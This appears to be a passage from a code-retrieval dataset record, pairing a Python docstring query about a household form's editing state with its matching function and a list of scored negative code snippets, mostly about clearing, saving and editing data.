updateDataStorage(infoToPlot, directory):\n \n \n dataStored=pickle.load(open(os.path.join(directory,'data.pkl'), 'rb'))\n \n for key, value in dataStored.items():\n value += infoToPlot[key]\n infoToPlot[key]=[] \n \n \n with 
open(os.path.join(directory,'data.pkl'), 'wb') as f:\n pickle.dump(dataStored, f, pickle.HIGHEST_PROTOCOL)", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear_all(self):\n self._data = {}\n self.uncache()\n self.dirty = True\n self.shipping_method = None\n self.payment_method = None\n self.customer_comment = \"\"", "def restore_data(self):\n self.R = self._Ro\n del self._Ro", "def store_and_clear(self, lst, key):\r\n df = pd.DataFrame(lst)\r\n df.set_index(['time'], inplace = True)\r\n with pd.HDFStore(self.STORE) as store:\r\n store.append(key, df)\r\n lst.clear()", "def save(self):\n self.remove()\n self._data.append(self)", "def remove_all_recs(self):\n return self.storage.clear()", "def delete(self):\n first = self.data[0]\n self.data.pop(0)\n self.size = self.size - 1\n return first", "def _save_data(self):\n super()._save_data()\n if self.data:\n # FIXES [BUG-034].\n WeatherForecastObservation.objects.all().delete()\n self.state['inserted_elements'] = len(WeatherForecastObservation.objects.bulk_create(self.data))\n self.logger.info('Successfully saved %d elements.' % self.state['inserted_elements'])\n else:\n self.logger.info('No elements were saved because no elements were available.')\n self.data = None", "def clear(self):\n self._state[\"data\"].clear()\n self._state[\"session\"].request_rerun()", "def clear(self):\n self._state[\"data\"].clear()\n self._state[\"session\"].request_rerun()", "def clear(self):\n self._state[\"data\"].clear()\n self._state[\"session\"].request_rerun()", "def clear():\n global d\n for key in d.keys():\n del d[key]", "def clear(self) -> None:\n self.da = DynamicArray()", "def clear(self):\n self.db_dict.clear()", "def clear(self) -> None:", "def test_data_object_del_all(self):\n pass", "def remove(self, data_id, idx):\n temp = self.database[data_id]\n del temp[idx]\n self.database[data_id] = temp", "def devClearStores(self):\n self._impDataIndex = 0\n self.storeTree = MovieStoreTree()\n self.storeHeap = MovieStoreHeap()\n self.storeHash = MovieStoreHash()\n self.benchmarkDisplay.binarySearchTree.set(0)\n self.benchmarkDisplay.binaryHeap.set(0)\n self.benchmarkDisplay.hashTable.set(0)\n self.benchmarkDisplay.binarySearchTreeDepth.set(0)\n self.benchmarkDisplay.binaryHeapDepth.set(0)", "def clear(self):\n length = len(self.data)\n self.data = [[] for j in range(length)]", "def Update_Saved(self, del_id='0', del_keywords='error'):\n\n self.data = np.load(self.cache_path, allow_pickle=True)[()]\n\n ID = self.data.keys()\n\n for id in ID:\n if not 'valid' in self.data[id]:\n self.data[id]['valid'] = 1\n\n if self.data[id]['valid'] == 0:\n continue\n\n if del_keywords in self.data[id]['post']:\n print(\"delete \" + self.data[id]['link'] + self.data[id]['post'])\n self.data[id]['valid'] = 0\n\n if del_id in ID:\n self.data[del_id]['valid'] = 0\n print(\"delete \" + self.data[del_id]['post'])\n\n np.save(self.cache_path, self.data)", "def data_cleaning():\n conn = get_connect()\n conn.execute(\"DELETE FROM championMatchData WHERE kills < 2 AND deaths < 2 AND assists < 2\")\n conn.commit()\n conn.close()\n return", "def clear_data(self):\n\t\tfor attr in self.coeff_vectors.iterkeys():\n\t\t\tdel self.coeff_vectors[attr][:]\n\t\tself.coeff_vectors.clear()\n\t\tself.coeff_vectors = None", "def reset(self):\n for k in self.data_keys:\n setattr(self, k, [])\n self.size = 0", "def clearData(self):\r\n self.title.setVal(\"\")\r\n self.authorBox.clearData()\r\n 
self.addPrimeAuthorFn()" ]
[ "0.69582635", "0.67999136", "0.67593694", "0.6599251", "0.6595057", "0.6536432", "0.6519219", "0.649931", "0.64161766", "0.6401068", "0.63972634", "0.6385674", "0.63851345", "0.6344443", "0.6343384", "0.63345444", "0.63222915", "0.63222915", "0.6261738", "0.62559605", "0.6239337", "0.6200578", "0.61816484", "0.61813486", "0.61711234", "0.61448365", "0.6114229", "0.60904866", "0.60830057", "0.60745275", "0.60563624", "0.6047168", "0.60434306", "0.6020696", "0.6012652", "0.6001625", "0.59965587", "0.5967561", "0.59650046", "0.5955149", "0.5951163", "0.59404844", "0.5939103", "0.5896437", "0.58659136", "0.58581436", "0.58546937", "0.5848697", "0.5829881", "0.5814445", "0.57959473", "0.5795469", "0.5779895", "0.57692826", "0.5764682", "0.5763618", "0.5756866", "0.5752387", "0.5750136", "0.5740325", "0.5726243", "0.5725746", "0.57197064", "0.57188463", "0.5715946", "0.5715946", "0.5697721", "0.5696952", "0.56915766", "0.56905895", "0.56892", "0.56870353", "0.56870353", "0.56870353", "0.56870353", "0.56870353", "0.56870353", "0.56870353", "0.5685759", "0.5678705", "0.56652325", "0.5663085", "0.56524837", "0.5646392", "0.5644465", "0.5633083", "0.5633083", "0.5633083", "0.5631216", "0.56309503", "0.56250674", "0.5621405", "0.5618578", "0.5593228", "0.5591005", "0.55881375", "0.55871886", "0.55841064", "0.556964", "0.55527717", "0.5547686" ]
0.0
-1
Checks that household is in editing state.
def clean(self): cleaned_data = super().clean() if any(self.errors): # Don't bother validating unless each field is valid on its own return if not self.household.editing: raise forms.ValidationError("Household is not in editing mode.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def can_edit(self):\n return self.state not in (\n 'scanning', 'resulted', 'cancelled', 'aborted')", "def is_edit(self):\n return self._tag == 'edit'", "def _check_is_editable(self, raise_error: bool = True) -> bool:", "def is_editable(self) -> bool | None:\n return self.check_is_editable(raise_error=False)", "def is_editable(self):\n return self.load_model().is_editable_in_committee()", "def is_editable ( self, object ):\n return self.editable", "def is_editable ( self, object ):\n return self.editable", "def IsEditable(self):\r\n\r\n return self._edit", "def can_edit(self):\n return self._can_edit", "def is_editable(self):\n return self.load_model().is_editable_in_dossier()", "def edit_allowed(self):\n account = Account.current_user_account\n if account is None:\n return False\n return self.user_can_edit(account.user)", "def is_editable(obj, request):\n if hasattr(obj, \"is_editable\"):\n return obj.is_editable(request)\n else:\n perm = obj._meta.app_label + \".\" + obj._meta.get_change_permission()\n return request.user.is_authenticated() and request.user.has_perm(perm)", "def user_can_edit(self, user):\n return user == self.owner", "def hasEditVariable(self, variable: Variable, /) -> bool:\n ...", "def _view_is_editable(node):\n return node.tag == 'form' or node.tag == 'tree' and node.get('editable')", "def is_map_editable(self):\n return self.is_editable", "def raise_not_editable(self, viewer):\n if viewer.has_perm(\"bookwyrm.edit_instance_settings\"):\n return\n raise PermissionDenied()", "def testOwnershipAfterEdit(self):\n self.simulateATGUIInteraction(task='edit')\n self.failUnlessEqual(self.person.getOwnerTuple()[1], 'abc123')", "def who_edits(self):\n\t\treturn self.editing", "def _check_is_editable(self, raise_error: bool = True) -> bool:\n try:\n # static analysis: ignore[incompatible_call]\n self._object.mod.update() # type: ignore[call-arg]\n except prawcore.exceptions.Forbidden as error:\n if not raise_error:\n return False\n raise submanager.exceptions.NotAModError(\n self.config,\n message_pre=(\n f\"Account {self.config.context.account!r} must \"\n \"be a moderator to update widgets\"\n ),\n message_post=error,\n ) from error\n\n return True", "def is_people_with_link_can_edit(self):\n return self._tag == 'people_with_link_can_edit'", "def assert_can_edit(selenium, obj, can_edit):\n ui_service = _get_ui_service(selenium, obj=obj)\n info_page = ui_service.open_info_page_of_obj(obj)\n els_shown_for_editor = info_page.els_shown_for_editor()\n assert [item.exists for item in els_shown_for_editor] == \\\n [can_edit] * len(els_shown_for_editor)\n if can_edit:\n _assert_title_editable(obj, selenium, info_page)", "def can_be_edited(self, user):\n return (self.is_public or user == self.owner or\n user in list(self.auth_users.all()))", "def can_edit(self, user):\n return self.author_id == user.id or user.is_staff", "def allow_to_edit(user):\n return allow_to_edit_well(user)", "def is_comment_editable(self, comment_id):\r\n return self._is_element_visible(\"#comment_{} .action-edit\".format(comment_id))", "def check_is_editable(self, raise_error: bool = True) -> bool | None:\n if self._validated is None or (\n self._validated is False and raise_error\n ):\n self.validate(raise_error=raise_error)\n if not self.is_valid:\n return None\n return self._check_is_editable(raise_error=raise_error)", "def dummy():\n\t\t\tself.edit = True", "def isDirty(self):\n return not not ((self.isdirty and self.attendees and\n self.canEditThisEvent()) or self.getPendingEvents())", "def 
testMemberCanEdit(self):\n self.client.login(username=\"admin\", password=\"test\")\n response = self.client.get(reverse(\"task_detail\", args=[1]))\n self.failUnlessEqual(response.status_code, 200)\n self.failUnless(response.content.find(\"<h2>Edit</h2>\") != -1,\n \"Authenticated users cannot edit tasks.\")\n self.client.logout()", "def testAssistantOwnershipAfterEdit(self):\n self.failUnless(self._testAssistantOwnershipAfter(task='edit'), \"designated assistant is not listed as an owner\")", "def is_auto_editable ( self, object ):\n return self.auto_editable", "def can_edit_user(user):\n\tu = current_user._get_current_object()\n\treturn u==user or u.is_admin()", "def can_edit(self, user):\n if user.has_perm('funding.make_application_decisions'):\n # Funding manager can update things later, if required\n return True\n # Applicants can only edit the application before the final review step\n if self.status in ('S', 'U'):\n if self.applicant == user:\n return True\n return False", "def edit(self,item=None):\r\n raise AbstractError\r\n return False", "def is_item_editor(self,user):\n if user.is_anonymous():\n return False\n if self.group:\n grouptest = user.person == self.group.project_leader or user.person == self.group.editor\n return user.is_staff or user.is_superuser or user.id == self.creator_id", "def canEditThisEvent(self):\n user = self.REQUEST.get('AUTHENTICATED_USER')\n if user is None:\n return 0\n if user.getId() != self.getCalendarUser() and \\\n self.to_date < DateTime():\n return 0\n return user.has_permission('Modify portal content', self)", "def edit(self):\n\n pass", "def field_is_editable(field, node):\n return (\n (not field.readonly or READONLY.search(str(field.states or \"\"))) and\n (node.get('readonly') != \"1\" or READONLY.search(node.get('attrs') or \"\"))\n )", "def can_user_edit(self, user):\n\n return user.is_authenticated and (\n user.has_role('admin') or\n unicode(self.user_id) == user.get_id()\n )", "def unsaved_details_exist(self):\r\n return (self.talkDetailsWidget.saveButton.isEnabled() and\r\n (self.talkDetailsWidget.titleLineEdit.text() or\r\n self.talkDetailsWidget.presenterLineEdit.text() or\r\n self.talkDetailsWidget.categoryLineEdit.text() or\r\n self.talkDetailsWidget.descriptionTextEdit.toPlainText()))", "def OnToggleEdit(self, event):\n\t\ttoggle = self.btn_edit.GetToggle()\n\t\tif not toggle:\n\t\t\tif not util.gAuthen.Authenticate(util.ADMIN):\n\t\t\t\tself.btn_edit.SetToggle(not toggle)\n\t\t\t\treturn \n\t\tself.UpdateToggle()", "def onMouseEdit(self, event):\n\n data = self.app.data\n axes = self.hemisphereMat.figure.axes[0].axes\n\n if not event.inaxes:\n return False\n if event.dblclick:\n return False\n\n if self.ui.checkEditHorizonMask.isChecked():\n suc = self.editHorizonMask(event=event, data=data)\n elif self.ui.checkEditBuildPoints.isChecked():\n suc = self.editBuildPoints(event=event, data=data, axes=axes)\n else:\n return False\n return suc", "def get_editable(self, user):\n if self.doc.get('locked'): return False\n return user.get('role') in ('admin', 'manager', 'engineer')", "def editChange(self,editBtn):\n if self.edit ==True:\n self.updateDetails(\"normal\") #update details column\n self.edit = False #switch boolean\n self.editBtn.setText(\"Edit\") #update button text\n else:\n self.updateDetails(\"edit\") #update details column\n self.edit= True #switch boolean\n self.editBtn.setText(\"Stop Editing\") #update button text", "def get_editable(self, user):\n return user.get('role') == 'admin'", "def canUndo(self):\n return 
self._index > 0", "def _changeable_fields(self, request, obj):\n return not obj or not self.is_readonly(request, obj)", "def is_anonymous_change(self):\n return self.editor is None", "def edit():", "def start_editing(self):\r\n if self._mode is None:\r\n self._mode = 'edit'\r\n params = {\r\n 'f' : 'json',\r\n 'sessionID' : self._guid\r\n }\r\n url = \"%s/startEditing\" % self._url\r\n res = self._con.post(url, params)\r\n return res['success']\r\n return False", "def checkPermissionEditUsers(self):\n user = self.REQUEST.AUTHENTICATED_USER\n\n return bool(user.has_permission(eionet_edit_users, self))", "def IsEditCancelled(self):\r\n\r\n return self.editCancelled", "def isDraft(self): #$NON-NLS-1$\r", "def IsColumnEditable(self, column):\r\n\r\n return self._header_win.GetColumn(column).IsEditable()", "def can_edit(self, can_edit):\n\n self._can_edit = can_edit", "def is_exp_set(self):\n if self.exp_id is None:\n return False\n if self.working_dir is None:\n return False\n if self.id != str(self.Id_widget.text()).strip():\n return False\n return True", "def is_legal_move(self, house_num):\n return True", "def check_state(self):\n pass", "def check_for_edit(self, force):\n if force:\n self._manipulations = {\"bri\": 0, \"con\": 0, \"sat\": 0}\n return 0\n elif self._manipulations != {\"bri\": 0, \"con\": 0, \"sat\": 0}:\n self._app[\"statusbar\"].message(\n \"Image has been edited, add ! to force\", \"warning\")\n return 1\n return 0", "def soft_assert_role_cannot_be_edited(soft_assert, obj):\n info_widget = factory.get_cls_webui_service(\n objects.get_plural(obj.type))().open_info_page_of_obj(obj)\n role_field_element = info_widget.role_to_edit\n role_field_element.inline_edit.open()\n # wait until new tab contains info page url\n _, new_tab = browsers.get_browser().windows()\n test_utils.wait_for(lambda: new_tab.url.endswith(url.Widget.INFO))\n soft_assert.expect(not role_field_element.add_person_text_field.exists,\n \"There should be no input field.\")", "def is_valid(self):\n return self.eyes[0] and self.eyes[1]", "def editing_mode(self):\n return self.session.editing_mode", "def validarea(state, area):\n if area > len(state) - MEMORY:\n state[HEAD][STATUS] = OOB\n return False\n else:\n return True", "def state_preview_validate(cfg, app, win, events):", "def IsEditCancelled(self):\r\n\r\n return self._editCancelled", "def __lastEditPositionAvailable(self):\n self.gotoLastEditAct.setEnabled(True)", "def test_edit(self):\n r = main.List.connection()\n main.List.add(r, \"ToDo\", 1, \"Buy apples\", 2, \"20.05.2015\")\n main.List.edit(r, \"ToDo\", 1, \"Buy bananas, not apples\", 2, \"20.05.2015\")\n task = main.List.pull_from_redis(r, \"ToDo\", False)\n if task and task is not None:\n check = task[\"1\"][\"description\"] == \"Buy bananas, not apples\"\n self.assertTrue(check, \"Editing failed.\")", "def flags(self, index):\n result = QtGui.QStandardItemModel.flags(self, index)\n return result & ~QtCore.Qt.ItemIsEditable", "def can_undo(self) -> bool:\n\n return self.position > 0", "def get_list_editable(self, request):\n current = self.prescription\n if request.user.has_perm('prescription.can_admin') or self.lock_after == 'never':\n return self.list_editable\n\n if (self.lock_after == 'endorsement' and not current.is_draft) or (self.lock_after == 'closure' and current.is_closed):\n return ('id',)\n else:\n return self.list_editable", "def office_edit_process_view(request):\n authority_required = {'verified_volunteer'} # admin, verified_volunteer\n if not voter_has_authority(request, 
authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n office_id = convert_to_int(request.POST.get('office_id', 0))\n office_name = request.POST.get('office_name', False)\n google_civic_office_name = request.POST.get('google_civic_office_name', False)\n google_civic_election_id = request.POST.get('google_civic_election_id', 0)\n primary_party = request.POST.get('primary_party', False)\n state_code = request.POST.get('state_code', False)\n\n election_state = ''\n if state_code is not False:\n election_state = state_code\n elif google_civic_election_id:\n election_manager = ElectionManager()\n results = election_manager.retrieve_election(google_civic_election_id)\n if results['election_found']:\n election = results['election']\n election_state = election.get_election_state()\n\n # Check to see if this office is already in the database\n office_on_stage_found = False\n try:\n office_query = ContestOffice.objects.filter(id=office_id)\n if len(office_query):\n office_on_stage = office_query[0]\n office_on_stage_found = True\n except Exception as e:\n handle_record_not_found_exception(e, logger=logger)\n\n try:\n if office_on_stage_found:\n # Update\n # Removed for now: convert_to_int(office_on_stage.google_civic_election_id) >= 1000000 and\n if office_name is not False:\n office_on_stage.office_name = office_name\n if google_civic_office_name is not False:\n office_on_stage.google_civic_office_name = google_civic_office_name\n if primary_party is not False:\n office_on_stage.primary_party = primary_party\n if positive_value_exists(election_state):\n office_on_stage.state_code = election_state\n office_on_stage.save()\n office_on_stage_id = office_on_stage.id\n messages.add_message(request, messages.INFO, 'Office updated.')\n google_civic_election_id = office_on_stage.google_civic_election_id\n\n return HttpResponseRedirect(reverse('office:office_summary', args=(office_on_stage_id,)) +\n \"?google_civic_election_id=\" + str(google_civic_election_id))\n else:\n # Create new\n office_on_stage = ContestOffice(\n office_name=office_name,\n google_civic_election_id=google_civic_election_id,\n state_code=election_state,\n )\n # Removing this limitation: convert_to_int(office_on_stage.google_civic_election_id) >= 1000000 and\n if primary_party is not False:\n office_on_stage.primary_party = primary_party\n office_on_stage.save()\n messages.add_message(request, messages.INFO, 'New office saved.')\n\n # Come back to the \"Create New Office\" page\n return HttpResponseRedirect(reverse('office:office_new', args=()) +\n \"?google_civic_election_id=\" + str(google_civic_election_id))\n except Exception as e:\n handle_record_not_saved_exception(e, logger=logger)\n messages.add_message(request, messages.ERROR, 'Could not save office.')\n\n return HttpResponseRedirect(reverse('office:office_list', args=()) +\n \"?google_civic_election_id=\" + google_civic_election_id)", "def raise_not_editable(self, viewer):\n if not self.id or viewer.has_perm(\"bookwyrm.create_invites\"):\n return\n raise PermissionDenied()", "def can_edit_profile(user: User, owner: User) -> bool:\n\n return has_permission(user, \"edit_profiles\") or user == owner", "def isowner(self, o):\n return self._owner is o", "def isdirty(self):\n\n return not not self._olddata", "def can_edit_or_403(self, user):\n if self.get_permission_level(user) < self.OWNER_PERMISSION:\n raise PermissionDenied\n return True", "def editInPrimStateLayer(self):\n return self.__EditInLayer(self)", "def can_edit_or_403(self, user):\n if 
user.id != self.game_master.id:\n raise PermissionDenied\n return True", "def edit(tesserae, tessera_id):\n try:\n return tesserae.edit(tessera_id)\n except TesseraError, e:\n sys.stderr.write(\"Error: %s\\n\", str(e))\n return False", "def edit_object(obj):\n return __EditMode(obj)", "def _authorize_stage_change(user: User, post: Post, new_stage_id: int) -> bool:\n legit_stages = (post.stage.prev_stage_id, post.stage.next_stage_id)\n\n if new_stage_id in legit_stages and post.assignee == user:\n return True\n\n if user.has_perm(\"magplan.edit_extended_post_attrs\"):\n return True\n\n return False", "def is_checkedin(self, guest_name):\n pass", "def has_change_permission(self, request, obj=None):\n has_class_permission = super(EntryAdmin, self).has_change_permission(request, obj)\n if not has_class_permission:\n return False\n if obj is not None and not request.user.is_superuser and request.user.id != obj.author.id:\n return False\n return True", "def test_handle_edit_not_admin(self):\n test_user = User(\"userid\")\n team = Team(\"BRS\", \"brs\", \"brS\")\n self.db.retrieve.return_value = test_user\n self.db.query.return_value = [team]\n with self.app.app_context():\n self.assertTupleEqual(self.testcommand.handle(\"team \"\n \"edit brs\", user),\n (self.testcommand.permission_error, 200))\n self.db.store.assert_not_called()", "def IsColumnEditable(self, column):\r\n\r\n if column < 0 or column >= self.GetColumnCount():\r\n raise Exception(\"Invalid column\")\r\n \r\n return self._columns[column].IsEditable()", "def can_edit(self, user, user_is_admin=False):\r\n if user is None or isinstance(user, FakeAccount):\r\n return False\r\n elif user_is_admin or self.author_id == user._id:\r\n return True\r\n elif Subreddit._by_name('discussion').is_editor(user):\r\n return True\r\n else:\r\n return False", "def allow_edit_by(self, user2_compare):\n if user2_compare.is_superuser:\n return True\n\n if user2_compare == self.user:\n return True\n\n if (self.creator and self.creator == user2_compare) or \\\n (self.owner and self.owner == user2_compare):\n if self.status:\n return True\n\n if user2_compare.has_perm('profiles.change_profile', self):\n return True\n\n return False", "def is_onhold(self) -> bool:", "def edit_button_clicked(self, obj):\n handle = self.get_selected()\n if handle:\n note = self.dbstate.db.get_note_from_handle(handle)\n try:\n from .. 
import EditNote\n EditNote(self.dbstate, self.uistate, self.track, note,\n callertitle = self.callertitle,\n extratype = [self.notetype] )\n except WindowActiveError:\n pass", "def checkin(self):\n folio = self.folio_id\n if folio.payment_deposits <= 0:\n raise UserError(_(\"\"\"No record of security deposit found on folio {}\n \"\"\".format(folio.name)))\n if folio.state != 'on_queue':\n raise UserError(_(\n 'Folio {} is not yet to be processed'.format(self.folio_id.name)))\n hours, minutes = decimal_to_time(self.env.user.company_id.checkin_hour)\n can_check_in = datetime.combine(\n date.today(), tm(hours, minutes)) < datetime.now()\n if not can_check_in:\n raise UserError(\n 'Guest(s) cannot be checked in earlier than {}'.format(\n self.env.user.company_id.checkin_hour))\n if self.folio_id.room_id.occupy():\n self.folio_id.write({'state': 'checkin'})", "def flags(self, index):\n if not index.isValid():\n return Qt.ItemIsEditable\n return Qt.ItemIsEnabled | Qt.ItemIsEditable", "def __call__(self):\n econtext = get_econtext()\n if econtext is None:\n # tests, probably\n return True\n # kss_inline_editable can be set to false in a template, and this\n # will prohibit inline editing in the page\n kss_inline_editable = econtext.vars.get('kss_inline_editable', None)\n # check the setting in site properties\n context = aq_inner(self.context)\n portal_properties = getToolByName(context, 'portal_properties')\n enable_inline_editing = None\n if getattr(aq_base(portal_properties), 'site_properties', None) is not None:\n site_properties = portal_properties.site_properties\n if getattr(aq_base(site_properties), 'enable_inline_editing', None) is not None:\n enable_inline_editing = site_properties.enable_inline_editing\n # If none of these is set, we enable inline editing. 
The global\n # site_property may be overwritten by the kss_inline_editable variable\n if kss_inline_editable is None:\n inline_editable = enable_inline_editing\n else:\n inline_editable = kss_inline_editable\n if inline_editable is None:\n inline_editable = True\n # In addition we also check suppress_preview.\n # suppress_preview is set by CMFEditions, when version preview is shown\n # This means inline editing should be disabled globally\n suppress_preview = econtext.vars.get('suppress_preview', False)\n return inline_editable and not suppress_preview", "def edit_draft(self):\r\n EmptyPromise(\r\n lambda: self.q(css='.create-draft').present,\r\n 'Wait for edit draft link to be present'\r\n ).fulfill()\r\n\r\n self.q(css='.create-draft').first.click()\r\n\r\n EmptyPromise(\r\n lambda: self.q(css='.editing-draft-alert').present,\r\n 'Wait for draft mode to be activated'\r\n ).fulfill()", "def isDirty(self):\n\t#@DEBUG christophe have to fix denoising optionnal issue prior to set isDirty() to True\n return False", "def _checkActions(self, editor, setSb=True):\n if editor is not None:\n self.saveAct.setEnabled(editor.isModified())\n self.revertAct.setEnabled(editor.isModified())\n \n self.undoAct.setEnabled(editor.isUndoAvailable())\n self.redoAct.setEnabled(editor.isRedoAvailable())\n self.gotoLastEditAct.setEnabled(\n editor.isLastEditPositionAvailable())\n \n lex = editor.getLexer()\n if lex is not None:\n self.commentAct.setEnabled(lex.canBlockComment())\n self.uncommentAct.setEnabled(lex.canBlockComment())\n self.streamCommentAct.setEnabled(lex.canStreamComment())\n self.boxCommentAct.setEnabled(lex.canBoxComment())\n else:\n self.commentAct.setEnabled(False)\n self.uncommentAct.setEnabled(False)\n self.streamCommentAct.setEnabled(False)\n self.boxCommentAct.setEnabled(False)\n \n if editor.hasBookmarks():\n self.bookmarkNextAct.setEnabled(True)\n self.bookmarkPreviousAct.setEnabled(True)\n self.bookmarkClearAct.setEnabled(True)\n else:\n self.bookmarkNextAct.setEnabled(False)\n self.bookmarkPreviousAct.setEnabled(False)\n self.bookmarkClearAct.setEnabled(False)\n \n if editor.hasSyntaxErrors():\n self.syntaxErrorGotoAct.setEnabled(True)\n self.syntaxErrorClearAct.setEnabled(True)\n else:\n self.syntaxErrorGotoAct.setEnabled(False)\n self.syntaxErrorClearAct.setEnabled(False)\n \n if editor.hasWarnings():\n self.warningsNextAct.setEnabled(True)\n self.warningsPreviousAct.setEnabled(True)\n self.warningsClearAct.setEnabled(True)\n else:\n self.warningsNextAct.setEnabled(False)\n self.warningsPreviousAct.setEnabled(False)\n self.warningsClearAct.setEnabled(False)\n \n if editor.hasCoverageMarkers():\n self.notcoveredNextAct.setEnabled(True)\n self.notcoveredPreviousAct.setEnabled(True)\n else:\n self.notcoveredNextAct.setEnabled(False)\n self.notcoveredPreviousAct.setEnabled(False)\n \n if editor.hasTaskMarkers():\n self.taskNextAct.setEnabled(True)\n self.taskPreviousAct.setEnabled(True)\n else:\n self.taskNextAct.setEnabled(False)\n self.taskPreviousAct.setEnabled(False)\n \n if editor.hasChangeMarkers():\n self.changeNextAct.setEnabled(True)\n self.changePreviousAct.setEnabled(True)\n else:\n self.changeNextAct.setEnabled(False)\n self.changePreviousAct.setEnabled(False)\n \n if editor.canAutoCompleteFromAPIs():\n self.autoCompleteFromAPIsAct.setEnabled(True)\n self.autoCompleteFromAllAct.setEnabled(True)\n else:\n self.autoCompleteFromAPIsAct.setEnabled(False)\n self.autoCompleteFromAllAct.setEnabled(False)\n self.autoCompleteAct.setEnabled(\n 
editor.canProvideDynamicAutoCompletion())\n self.calltipsAct.setEnabled(editor.canProvideCallTipps())\n self.codeInfoAct.setEnabled(self.__isEditorInfoSupportedEd(editor))\n \n if editor.isPyFile() or editor.isRubyFile():\n self.gotoPreviousDefAct.setEnabled(True)\n self.gotoNextDefAct.setEnabled(True)\n else:\n self.gotoPreviousDefAct.setEnabled(False)\n self.gotoNextDefAct.setEnabled(False)\n \n self.sortAct.setEnabled(editor.selectionIsRectangle())\n enable = editor.hasSelection()\n self.editUpperCaseAct.setEnabled(enable)\n self.editLowerCaseAct.setEnabled(enable)\n \n if setSb:\n line, pos = editor.getCursorPosition()\n enc = editor.getEncoding()\n lang = editor.getLanguage()\n eol = editor.getEolIndicator()\n zoom = editor.getZoom()\n self.__setSbFile(\n editor.getFileName(), line + 1, pos, enc, lang, eol, zoom)\n \n self.checkActions.emit(editor)\n \n saveAllEnable = False\n for editor in self.editors:\n if editor.isModified():\n saveAllEnable = True\n self.saveAllAct.setEnabled(saveAllEnable)", "def editor_is(self, user):\n if not user:\n return False\n if JobPost.query.filter_by(domain=self, user=user).notempty():\n return True\n return False", "def DoEdit(self,event):\r\n raise UncodedError", "def IsReadOnly(self) -> bool:", "def _unfiled_box():\n return db.box((db.box.name == 'Unfiled') & (db.box.owner == auth.user.id))" ]
[ "0.7178205", "0.71516967", "0.7085395", "0.69433004", "0.6895201", "0.68161714", "0.68161714", "0.66513175", "0.6608026", "0.6533432", "0.6527401", "0.6448996", "0.6317548", "0.62204605", "0.6207848", "0.61636037", "0.6070379", "0.6058616", "0.5964224", "0.5950804", "0.59350204", "0.5930872", "0.5927125", "0.5901295", "0.58840525", "0.58791", "0.5828084", "0.5823023", "0.58227617", "0.5807426", "0.5805622", "0.5803488", "0.57960665", "0.5782442", "0.5762461", "0.5754379", "0.5747761", "0.5738128", "0.5730384", "0.56636465", "0.5661355", "0.5634615", "0.5631286", "0.56120324", "0.5610141", "0.5600621", "0.55992484", "0.5566271", "0.5562768", "0.55463374", "0.55456835", "0.5540493", "0.55377424", "0.5520764", "0.5511306", "0.5503428", "0.55031735", "0.54776", "0.5476462", "0.54694265", "0.5451189", "0.5425096", "0.5424951", "0.53701514", "0.53666043", "0.53491604", "0.5343262", "0.53353304", "0.5319322", "0.5311338", "0.5296654", "0.52960175", "0.5290787", "0.52852774", "0.5284959", "0.5280014", "0.52779377", "0.5268375", "0.52600336", "0.52585745", "0.52536154", "0.52493954", "0.5245498", "0.5235622", "0.52342767", "0.52326685", "0.52263784", "0.5219975", "0.52188736", "0.5207022", "0.5201546", "0.5200435", "0.51984024", "0.51904047", "0.5183927", "0.51770276", "0.5176511", "0.51755923", "0.51745677", "0.51430315" ]
0.66041714
9
Checks that total of all weights is 100. Weights may be negative.
def clean(self): if any(self.errors): # Don't bother validating unless each form is valid on its own return if self.get_total_weights() != 100: raise forms.ValidationError("Weights must sum to 100; try normalizing.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_weight_is_positive(self):\n nt.assert_greater(self.herb.weight, 0)", "def test_weighted_total(self):\r\n self.weighted_setup()\r\n self.submit_question_answer('H1P1', {'2_1': 'Correct', '2_2': 'Correct'})\r\n self.submit_question_answer('FinalQuestion', {'2_1': 'Correct', '2_2': 'Correct'})\r\n self.check_grade_percent(1.0)", "def test_weight_is_positive_carn(self):\n nt.assert_greater(self.carn.weight, 0)", "def test_basic(self):\n result = NonLinearWeights(0.85)\n self.assertAlmostEqual(result.cval, 0.85)", "def pct_bust(data):\n return round((data[\"new_total\"] > 21).sum() / len(data), 3)", "def test_weighted_accuracy(self):\n total_accuracy, weights = losses.weighted_accuracy(\n logits=self.logits, targets=self.targets, weights=self.targets >= 0)\n\n expected_accuracy = 2 / 3\n\n self.assertEqual(weights, 3)\n self.assertAlmostEqual(total_accuracy / weights, expected_accuracy)", "def check_sum(cls, values):\n _v = [0 if v is None else v for v in values.values()]\n if abs(sum(_v) - 1) > 0.01:\n raise ValueError(\n f\"All values must approximately sum to 1. Sum to {sum(_v)}\"\n )\n return values", "def check(self):\r\n self.check_probabilities()\r\n self.check_sum()", "def test_total_weight(self):\n varieties = [Coconut(variety) for variety in ['middle eastern',\n 'south asian',\n 'south asian',\n 'american',\n 'american',\n 'american']]\n self.inventory = Inventory()\n for variety in varieties:\n self.inventory.add_coconut(variety)\n self.assertEqual(self.inventory.total_weight(),\n 19.00,\n \"Your total weight is wrong\")", "def has_valid_sum(self):\n return 1 - MassFunction.precision <= self._sum() <= 1 + MassFunction.precision", "def set_weight_percent(self, void_percent=1.0):\n weight_total = 0.0\n for zaidNum, zaid in enumerate(self.zaids):\n for isotope, isotopeFraction in self.elementDict[zaid].weightPercentDict.items():\n if isotopeFraction != 0.0:\n self.weightPercent[isotope] = isotopeFraction * self.weightFraction[zaidNum] * void_percent\n weight_total += self.weightPercent[isotope]\n try:\n assert np.allclose(weight_total, 1.0 * void_percent)\n except AssertionError:\n print(\"Weight percent does not sum to 1.0 for {}. Check the material file.\".format(self.name))", "def total_weight (self, checkfn=None):\n weight = 0\n for item in self:\n if checkfn is not None and not checkfn(item):\n continue\n assert hasattr(item, \"weight\")\n weight += item.weight\n return weight", "def assert_valid_weights(self, w):\n\n if len(w) != self.n:\n raise AssertionError(\n \"Expected vector of {0} weights, received \"\n \"{1} weights instead: {2}.\".format(\n self.n,\n len(w),\n w\n ))\n\n if abs(np.sum(w) - 1.0) > 1E-6:\n raise AssertionError(\n \"Expected weights to sum to one. 
